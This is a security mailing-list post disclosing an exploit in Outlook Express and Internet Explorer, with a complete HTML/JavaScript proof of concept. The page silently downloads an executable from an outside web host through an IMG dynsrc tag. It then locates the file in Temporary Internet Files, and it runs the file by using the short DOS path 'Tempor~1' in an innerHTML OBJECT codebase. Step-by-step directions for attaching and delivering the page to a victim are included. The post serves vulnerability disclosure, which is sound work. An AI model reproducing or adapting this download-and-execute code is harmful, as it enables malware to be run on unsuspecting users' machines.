Outlook Express Attach Execution Exploit (img tag + innerHTML + TIF dos name)

["Elia Florio" <eflorio () edmaster it>]

> Using some informations posted on Bugtraq in this week,
> I found a very simple way to exploit "download&execution" of
> an .EXE file, directly from Outlook Express.
>
> This is my report:
>
> When an HTML page attached into a message,
> is started, it runs in the security zone of  "\Temporary Internet Files"
> (TIF).
>
> First: we can use the "dynsrc" trick of IMG tag
> to download an .EXE from the web - in a silent way - into TIF zone.
> NOTE: if we use "src", the browser does not recognize the image format
> (because it's an executable) and download it only in a partial way.
>
> Then - using javascript - we can get local path of "Temporary Internet
> Files" folder where
> the page was stored from Outlook Express and where the .EXE file will be
> downloaded.
> NOTE: we must add "[1]" or "[2]" or "[x]" at the end of .EXE filename,
> because IE
> rename temporary downloaded files.
>
> Finally, using ".innerHTML" exploit and knowing the exact path
> of the executable, we can run the .EXE file using this interesting trick:
>
>  - if we use a path which contains the string "\Temporary Internet Files",
>    IE will refuse to create ActiveX object for security restrictions and
> does not run the .EXE file;
>
> - but if we use old-dos path (c:\windows\tempor~1\content.ie5) instead
long
> path (c:\windows\temporary internet files\content.ie5),
>   IE is fooled and run the .EXE file;
>
> This is the JavaScript code for the HTML page
> (note: you must create an HTML file and attach it to e-mail message,
> this code does not work written directly inside the e-mail,
> the HTML page must be opened from Outlook Express)
>
> The exploit is easy to create if page and executable have a similar name
> (for example EXPLOIT.HTML and EXPLOIT.EXE).
> The .EXE file must be uploaded into a web-site before.
>
> NOTE: exploit is not an "automatic execution" of attachment,
> the victim must open the attached HTML page.
> --------------------------------------------------------------------------
--
> ----------------------------------------------------
> <HTML>
> <SCRIPT LANGUAGE="JavaScript">
> function runtimer() {
>  //we must wait until .EXE file is copied to \Temporary Internet Files
>  timerID=setTimeout('runit()',7000)
> }
>
> function runit () {
>   //catch local path of .EXE file
>   var url = document.location.href;
>   var path1=url.substring(8,url.length-5)+"[1].exe";
>
>   //we need only the final path string
>   //it starts from /Content.IE5/xxyyzz/
>   i=0;
>   var found=false;
>   var path2="";
>   while(i<path1.length) {
>    if(path1.substring(i,i+2)=="/C") {found=true;}
>    if(found) {path2=path2+path1.substring(i,i+1);}
>    i++;
>   }
>
>   //this is the trick using dos name "Tempor~1" instead long names
> "Temporary Internet Files"
>   path2="C:/WINDOWS/Tempor~1"+path2;
>   alert("LOCAL PATH = "+path2);
>
>   //finally run it with help of .innerHTML
>   document.body.innerHTML = '<OBJECT NAME="X"
> CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
> CODEBASE='+path2+'></OBJECT>';
>   }
> </SCRIPT>
> <body onLoad="runtimer()">
> <center>
> <h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>
> <img src="_some_image.jpg"
> dynsrc="http://web.tiscali.it/funkybus/exploit.exe";>
> <hr>
> <P>This page download (silently) an .EXE file using "IMG" tag
> into "\Temporary Internet Files" folder, then locate the local path
> of the .EXE using JavaScript and run it using .innerHtml exploit.</P>
> <hr>
> Exploit coded by Elia Florio
> (eflorio () edmaster it)
> </center>
> </body>
> </html>
> --------------------------------------------------------------------------
--
> ----------------------------------------------------